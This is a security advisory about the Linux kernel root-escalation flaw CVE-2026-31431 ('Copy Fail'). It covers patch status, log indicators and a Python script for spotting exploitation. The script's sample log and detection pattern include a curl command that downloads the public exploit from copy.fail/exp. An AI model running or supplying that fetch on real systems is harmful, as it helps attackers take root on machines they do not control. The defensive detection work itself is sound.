Copy Fail in Linux: vulnerability CVE-2026-31431 leads to root
Copy Fail, tracked as CVE-2026-31431, has emerged as a serious threat to Linux systems. The flaw allows local unprivileged users to elevate their privileges to root, putting millions of installations at risk. According to the report, the vulnerability affects nearly all Linux kernel versions released since 2017.
As of 1 May 2026, the fix had already been merged into the mainline Linux kernel, but many distributions had not yet incorporated the patch into their own builds. This creates a dangerous window of exposure, especially for environments that delay kernel updates.
How the vulnerability works
Copy Fail stems from a logical flaw in the Linux kernel’s cryptographic AEAD implementation. The problem lies in the handling of scatter-gather lists. Incorrect processing makes it possible for an attacker to overwrite four bytes in the page cache of any readable file on the system, including critical executable files such as setuid binaries.
By combining this flaw with AF_ALG sockets and the splice() system call, an attacker can leverage the condition to gain elevated privileges.
Distribution response remains uneven
Linux distributions have reacted at different speeds:
- Debian sid (unstable) has already been patched;
- stable Debian releases remain vulnerable, with no confirmed fixes backported to stable branches;
- Ubuntu and CloudLinux had not released fixes as of the cited date;
- Fedora, RHEL and others were in the process of rolling out patches;
- Arch Linux, following a rolling release model, appears to have applied the necessary fixes promptly.
In practice, this means patch status depends heavily on the distribution and release channel, making verification essential for security teams.
Signs of exploitation
Monitoring for signs of exploitation is considered critical. One potential indicator is the presence of the message «NET: Registered PF_ALG protocol family» in kern.log and syslog. The message itself is normal during boot and when legitimate applications use the feature, but it may warrant further investigation if it appears alongside other suspicious activity.
Investigators should also track interactions with the Xint website, where Proof of Concept (PoC) code has been published. In particular, attention should be paid to curl commands that query:
copy.fail/exp
Internal tests also showed that running a modified version of /usr/bin/su with altered page cache state can produce anomalies in authentication logs, including entries without an associated caller identifier. According to the report, this suggests that exploitation attempts may corrupt the runtime state of the binary, complicating post-compromise forensic analysis.
What organizations should do now
Organizations using Linux systems should prioritize remediation immediately. The report recommends:
- applying the latest available kernel fixes without delay;
- verifying whether the distribution has already backported the patch;
- monitoring logs for suspicious AF_ALG activity and unusual authentication events;
- reviewing outbound requests to copy.fail and related PoC resources;
- treating affected systems as potentially exposed until patch status is confirmed.
Given the breadth of impact and the ease with which local access can turn into full root compromise, CVE-2026-31431 should be treated as a high-priority vulnerability for any Linux environment.
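The two log indicators the report names (the PF_ALG registration message and requests to the copy.fail PoC host) are only meaningful in context, so a detector has to correlate them rather than alert on either alone. The following script is an added example, not code from the report or from CTT Report Hub: it parses syslog-style lines, records boot markers and PoC fetches per host, and then grades each PF_ALG registration as expected at boot, unexplained at runtime, or correlated with a PoC fetch. The log lines, hostnames, the boot-marker heuristic ("kernel: Linux version"), the 120-second boot grace period and the 10-minute correlation window are all constructed assumptions for illustration.

```python
"""Added example (not from the report): correlate the Copy Fail log indicators.

Indicators taken from the report: the kernel message
"NET: Registered PF_ALG protocol family" and requests to copy.fail.
Everything else (boot marker, time windows, sample log lines) is assumed."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

PF_ALG_MSG = "NET: Registered PF_ALG protocol family"        # indicator from the report
POC_URL = re.compile(r"\bcopy\.fail(?:/exp)?\b")               # PoC host from the report
BOOT_MARKER = "kernel: Linux version"                          # assumption: first kernel line of a boot
BOOT_GRACE = timedelta(seconds=120)                            # assumption: PF_ALG this soon after boot is expected
CORRELATION_WINDOW = timedelta(minutes=10)                     # assumption: PF_ALG near a PoC fetch is suspicious

# Classic syslog layout: "May  1 08:00:03 host message..."
SYSLOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<msg>.*)$"
)


@dataclass
class Finding:
    timestamp: datetime
    host: str
    indicator: str   # poc_fetch | pf_alg_boot | pf_alg_runtime | pf_alg_correlated
    severity: str    # info | medium | high
    line: str


def parse_line(line, year=2026):
    """Return (timestamp, host, message) for a syslog line, or None if it does not match."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
    return ts, m["host"], m["msg"]


def scan_log_lines(lines, year=2026):
    """Grade every PF_ALG registration and PoC fetch in the given lines, per host."""
    events = sorted(e for e in (parse_line(l, year) for l in lines) if e)
    boots, poc_fetches, findings = {}, {}, []

    # Pass 1: collect boot markers and PoC fetches so PF_ALG events can be judged in context.
    for ts, host, msg in events:
        if BOOT_MARKER in msg:
            boots.setdefault(host, []).append(ts)
        elif POC_URL.search(msg):
            poc_fetches.setdefault(host, []).append(ts)
            findings.append(Finding(ts, host, "poc_fetch", "high", msg))

    # Pass 2: classify each PF_ALG registration.
    for ts, host, msg in events:
        if PF_ALG_MSG not in msg:
            continue
        during_boot = any(timedelta(0) <= ts - b <= BOOT_GRACE for b in boots.get(host, []))
        near_poc = any(abs(ts - p) <= CORRELATION_WINDOW for p in poc_fetches.get(host, []))
        if near_poc:
            findings.append(Finding(ts, host, "pf_alg_correlated", "high", msg))
        elif during_boot:
            findings.append(Finding(ts, host, "pf_alg_boot", "info", msg))
        else:
            findings.append(Finding(ts, host, "pf_alg_runtime", "medium", msg))

    findings.sort(key=lambda f: f.timestamp)
    return findings


# Constructed sample log: not real data from any system.
SAMPLE_LOG = [
    "May  1 08:00:01 web01 kernel: Linux version 6.x-constructed (boot marker, constructed)",
    "May  1 08:00:03 web01 kernel: NET: Registered PF_ALG protocol family",
    "May  1 14:22:10 web01 shell-audit[2231]: curl -sSfL https://copy.fail/exp -o /tmp/exp",
    "May  1 14:22:41 web01 kernel: NET: Registered PF_ALG protocol family",
    "May  1 16:05:00 db02 kernel: NET: Registered PF_ALG protocol family",
    "not a syslog line",
]

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG):
        print(f"{f.timestamp:%b %d %H:%M:%S} {f.host:<6} {f.severity:<6} {f.indicator:<18} {f.line}")
```

Run against the constructed sample, the boot-time registration on web01 is graded info, the PoC fetch and the registration 31 seconds after it are graded high, and the registration on db02 with neither a boot marker nor a PoC fetch nearby is graded medium for follow-up. Feed real kern.log and syslog lines (and whatever source records command lines or outbound requests) through the same function; the thresholds are starting points to tune per environment.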
The report was obtained from the CTT Report Hub service. Rights to the report belong to its owner.
The full report can be read at the link.